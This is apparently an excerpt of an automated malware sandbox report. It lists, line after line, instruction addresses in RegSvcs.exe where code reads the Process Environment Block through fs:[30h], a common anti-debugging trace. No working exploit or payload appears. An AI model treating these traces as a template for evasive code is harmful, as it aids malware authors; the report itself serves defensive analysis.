                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E8A197 mov eax, dword ptr fs:[00000030h] 15_2_00E8A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F28158 mov eax, dword ptr fs:[00000030h] 15_2_00F28158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F24144 mov eax, dword ptr fs:[00000030h] 15_2_00F24144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F24144 mov eax, dword ptr fs:[00000030h] 15_2_00F24144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F24144 mov ecx, dword ptr fs:[00000030h] 15_2_00F24144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F24144 mov eax, dword ptr fs:[00000030h] 15_2_00F24144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F24144 mov eax, dword ptr fs:[00000030h] 15_2_00F24144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E96154 mov eax, dword ptr fs:[00000030h] 15_2_00E96154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E96154 mov eax, dword ptr fs:[00000030h] 15_2_00E96154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E8C156 mov eax, dword ptr fs:[00000030h] 15_2_00E8C156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EC0124 mov eax, dword ptr fs:[00000030h] 15_2_00EC0124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F50115 mov eax, dword ptr fs:[00000030h] 15_2_00F50115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3A118 mov ecx, dword ptr fs:[00000030h] 15_2_00F3A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3A118 mov eax, dword ptr fs:[00000030h] 15_2_00F3A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3A118 mov eax, dword ptr fs:[00000030h] 15_2_00F3A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3A118 mov eax, dword ptr fs:[00000030h] 15_2_00F3A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3E10E mov eax, dword ptr fs:[00000030h] 15_2_00F3E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3E10E mov ecx, dword ptr fs:[00000030h] 15_2_00F3E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3E10E mov eax, dword ptr fs:[00000030h] 15_2_00F3E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3E10E mov eax, dword ptr fs:[00000030h] 15_2_00F3E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3E10E mov ecx, dword ptr fs:[00000030h] 15_2_00F3E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3E10E mov eax, dword ptr fs:[00000030h] 15_2_00F3E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3E10E mov eax, dword ptr fs:[00000030h] 15_2_00F3E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3E10E mov ecx, dword ptr fs:[00000030h] 15_2_00F3E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3E10E mov eax, dword ptr fs:[00000030h] 15_2_00F3E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3E10E mov ecx, dword ptr fs:[00000030h] 15_2_00F3E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EA02E1 mov eax, dword ptr fs:[00000030h] 15_2_00EA02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EA02E1 mov eax, dword ptr fs:[00000030h] 15_2_00EA02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EA02E1 mov eax, dword ptr fs:[00000030h] 15_2_00EA02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E9A2C3 mov eax, dword ptr fs:[00000030h] 15_2_00E9A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E9A2C3 mov eax, dword ptr fs:[00000030h] 15_2_00E9A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E9A2C3 mov eax, dword ptr fs:[00000030h] 15_2_00E9A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E9A2C3 mov eax, dword ptr fs:[00000030h] 15_2_00E9A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E9A2C3 mov eax, dword ptr fs:[00000030h] 15_2_00E9A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EA02A0 mov eax, dword ptr fs:[00000030h] 15_2_00EA02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EA02A0 mov eax, dword ptr fs:[00000030h] 15_2_00EA02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F262A0 mov eax, dword ptr fs:[00000030h] 15_2_00F262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F262A0 mov ecx, dword ptr fs:[00000030h] 15_2_00F262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F262A0 mov eax, dword ptr fs:[00000030h] 15_2_00F262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F262A0 mov eax, dword ptr fs:[00000030h] 15_2_00F262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F262A0 mov eax, dword ptr fs:[00000030h] 15_2_00F262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F262A0 mov eax, dword ptr fs:[00000030h] 15_2_00F262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00ECE284 mov eax, dword ptr fs:[00000030h] 15_2_00ECE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00ECE284 mov eax, dword ptr fs:[00000030h] 15_2_00ECE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F10283 mov eax, dword ptr fs:[00000030h] 15_2_00F10283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F10283 mov eax, dword ptr fs:[00000030h] 15_2_00F10283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F10283 mov eax, dword ptr fs:[00000030h] 15_2_00F10283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h] 15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h] 15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h] 15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h] 15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h] 15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h] 15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h] 15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h] 15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h] 15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h] 15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h] 15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h] 15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E8826B mov eax, dword ptr fs:[00000030h] 15_2_00E8826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E94260 mov eax, dword ptr fs:[00000030h] 15_2_00E94260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E94260 mov eax, dword ptr fs:[00000030h] 15_2_00E94260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E94260 mov eax, dword ptr fs:[00000030h] 15_2_00E94260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E96259 mov eax, dword ptr fs:[00000030h] 15_2_00E96259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F18243 mov eax, dword ptr fs:[00000030h] 15_2_00F18243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F18243 mov ecx, dword ptr fs:[00000030h] 15_2_00F18243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E8A250 mov eax, dword ptr fs:[00000030h] 15_2_00E8A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E8823B mov eax, dword ptr fs:[00000030h] 15_2_00E8823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EA03E9 mov eax, dword ptr fs:[00000030h] 15_2_00EA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EA03E9 mov eax, dword ptr fs:[00000030h] 15_2_00EA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EA03E9 mov eax, dword ptr fs:[00000030h] 15_2_00EA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EA03E9 mov eax, dword ptr fs:[00000030h] 15_2_00EA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EA03E9 mov eax, dword ptr fs:[00000030h] 15_2_00EA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EA03E9 mov eax, dword ptr fs:[00000030h] 15_2_00EA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EA03E9 mov eax, dword ptr fs:[00000030h] 15_2_00EA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EA03E9 mov eax, dword ptr fs:[00000030h] 15_2_00EA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EC63FF mov eax, dword ptr fs:[00000030h] 15_2_00EC63FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EAE3F0 mov eax, dword ptr fs:[00000030h] 15_2_00EAE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EAE3F0 mov eax, dword ptr fs:[00000030h] 15_2_00EAE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EAE3F0 mov eax, dword ptr fs:[00000030h] 15_2_00EAE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F343D4 mov eax, dword ptr fs:[00000030h] 15_2_00F343D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F343D4 mov eax, dword ptr fs:[00000030h] 15_2_00F343D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3E3DB mov eax, dword ptr fs:[00000030h] 15_2_00F3E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3E3DB mov eax, dword ptr fs:[00000030h] 15_2_00F3E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3E3DB mov ecx, dword ptr fs:[00000030h] 15_2_00F3E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3E3DB mov eax, dword ptr fs:[00000030h] 15_2_00F3E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E9A3C0 mov eax, dword ptr fs:[00000030h] 15_2_00E9A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E9A3C0 mov eax, dword ptr fs:[00000030h] 15_2_00E9A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E9A3C0 mov eax, dword ptr fs:[00000030h] 15_2_00E9A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E9A3C0 mov eax, dword ptr fs:[00000030h] 15_2_00E9A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E9A3C0 mov eax, dword ptr fs:[00000030h] 15_2_00E9A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E9A3C0 mov eax, dword ptr fs:[00000030h] 15_2_00E9A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E983C0 mov eax, dword ptr fs:[00000030h] 15_2_00E983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E983C0 mov eax, dword ptr fs:[00000030h] 15_2_00E983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E983C0 mov eax, dword ptr fs:[00000030h] 15_2_00E983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E983C0 mov eax, dword ptr fs:[00000030h] 15_2_00E983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F163C0 mov eax, dword ptr fs:[00000030h] 15_2_00F163C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F4C3CD mov eax, dword ptr fs:[00000030h] 15_2_00F4C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E8E388 mov eax, dword ptr fs:[00000030h] 15_2_00E8E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E8E388 mov eax, dword ptr fs:[00000030h] 15_2_00E8E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E8E388 mov eax, dword ptr fs:[00000030h] 15_2_00E8E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EB438F mov eax, dword ptr fs:[00000030h] 15_2_00EB438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EB438F mov eax, dword ptr fs:[00000030h] 15_2_00EB438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E88397 mov eax, dword ptr fs:[00000030h] 15_2_00E88397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E88397 mov eax, dword ptr fs:[00000030h] 15_2_00E88397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E88397 mov eax, dword ptr fs:[00000030h] 15_2_00E88397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3437C mov eax, dword ptr fs:[00000030h] 15_2_00F3437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F38350 mov ecx, dword ptr fs:[00000030h] 15_2_00F38350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F5A352 mov eax, dword ptr fs:[00000030h] 15_2_00F5A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F1035C mov eax, dword ptr fs:[00000030h] 15_2_00F1035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F1035C mov eax, dword ptr fs:[00000030h] 15_2_00F1035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F1035C mov eax, dword ptr fs:[00000030h] 15_2_00F1035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F1035C mov ecx, dword ptr fs:[00000030h] 15_2_00F1035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F1035C mov eax, dword ptr fs:[00000030h] 15_2_00F1035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F1035C mov eax, dword ptr fs:[00000030h] 15_2_00F1035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h] 15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h] 15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h] 15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h] 15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h] 15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h] 15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h] 15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h] 15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h] 15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h]15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h]15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h]15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h]15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h]15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h]15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECA30B mov eax, dword ptr fs:[00000030h]15_2_00ECA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECA30B mov eax, dword ptr fs:[00000030h]15_2_00ECA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECA30B mov eax, dword ptr fs:[00000030h]15_2_00ECA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8C310 mov ecx, dword ptr fs:[00000030h]15_2_00E8C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB0310 mov ecx, dword ptr fs:[00000030h]15_2_00EB0310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E904E5 mov ecx, dword ptr fs:[00000030h]15_2_00E904E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1A4B0 mov eax, dword ptr fs:[00000030h]15_2_00F1A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E964AB mov eax, dword ptr fs:[00000030h]15_2_00E964AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC44B0 mov ecx, dword ptr fs:[00000030h]15_2_00EC44B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1C460 mov ecx, dword ptr fs:[00000030h]15_2_00F1C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBA470 mov eax, dword ptr fs:[00000030h]15_2_00EBA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBA470 mov eax, dword ptr fs:[00000030h]15_2_00EBA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBA470 mov eax, dword ptr fs:[00000030h]15_2_00EBA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE443 mov eax, dword ptr fs:[00000030h]15_2_00ECE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE443 mov eax, dword ptr fs:[00000030h]15_2_00ECE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE443 mov eax, dword ptr fs:[00000030h]15_2_00ECE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE443 mov eax, dword ptr fs:[00000030h]15_2_00ECE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE443 mov eax, dword ptr fs:[00000030h]15_2_00ECE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE443 mov eax, dword ptr fs:[00000030h]15_2_00ECE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE443 mov eax, dword ptr fs:[00000030h]15_2_00ECE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE443 mov eax, dword ptr fs:[00000030h]15_2_00ECE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB245A mov eax, dword ptr fs:[00000030h]15_2_00EB245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8645D mov eax, dword ptr fs:[00000030h]15_2_00E8645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8E420 mov eax, dword ptr fs:[00000030h]15_2_00E8E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8E420 mov eax, dword ptr fs:[00000030h]15_2_00E8E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8E420 mov eax, dword ptr fs:[00000030h]15_2_00E8E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8C427 mov eax, dword ptr fs:[00000030h]15_2_00E8C427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F16420 mov eax, dword ptr fs:[00000030h]15_2_00F16420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F16420 mov eax, dword ptr fs:[00000030h]15_2_00F16420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F16420 mov eax, dword ptr fs:[00000030h]15_2_00F16420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F16420 mov eax, dword ptr fs:[00000030h]15_2_00F16420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F16420 mov eax, dword ptr fs:[00000030h]15_2_00F16420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F16420 mov eax, dword ptr fs:[00000030h]15_2_00F16420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F16420 mov eax, dword ptr fs:[00000030h]15_2_00F16420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECA430 mov eax, dword ptr fs:[00000030h]15_2_00ECA430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC8402 mov eax, dword ptr fs:[00000030h]15_2_00EC8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC8402 mov eax, dword ptr fs:[00000030h]15_2_00EC8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC8402 mov eax, dword ptr fs:[00000030h]15_2_00EC8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECC5ED mov eax, dword ptr fs:[00000030h]15_2_00ECC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECC5ED mov eax, dword ptr fs:[00000030h]15_2_00ECC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E925E0 mov eax, dword ptr fs:[00000030h]15_2_00E925E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE5E7 mov eax, dword ptr fs:[00000030h]15_2_00EBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE5E7 mov eax, dword ptr fs:[00000030h]15_2_00EBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE5E7 mov eax, dword ptr fs:[00000030h]15_2_00EBE5E7
